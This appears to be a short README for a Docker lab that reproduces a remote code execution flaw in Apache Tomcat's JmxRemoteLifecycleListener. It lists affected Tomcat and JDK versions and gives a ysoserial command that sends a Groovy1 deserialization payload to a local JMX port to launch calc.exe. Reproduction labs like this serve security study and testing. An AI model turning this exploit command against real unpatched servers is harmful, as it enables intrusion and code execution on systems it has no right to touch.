Remote code execution is possible with Apache Tomcat if JmxRemoteLifecycleListener is used and an attacker can reach JMX ports. The issue exists because this listener wasn't updated for consistency with the CVE-2016-3427 Oracle patch that affected credential types.
Impact version:
Tomcat [6.0.0 6.0.47]
Tomcat [7.0.0 7.0.72]
Tomcat [8.0.0-RC1 8.0.38]
Tomcat [8.5.0 8.5.6]
Tomcat [9.0.0.M1 9.0.0.M11]
Request jdk < 7u131 or 8u121
Run
docker-compose upAfter that, use ysoserial to exploit it.
java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit localhost 10001 Groovy1 calc.exe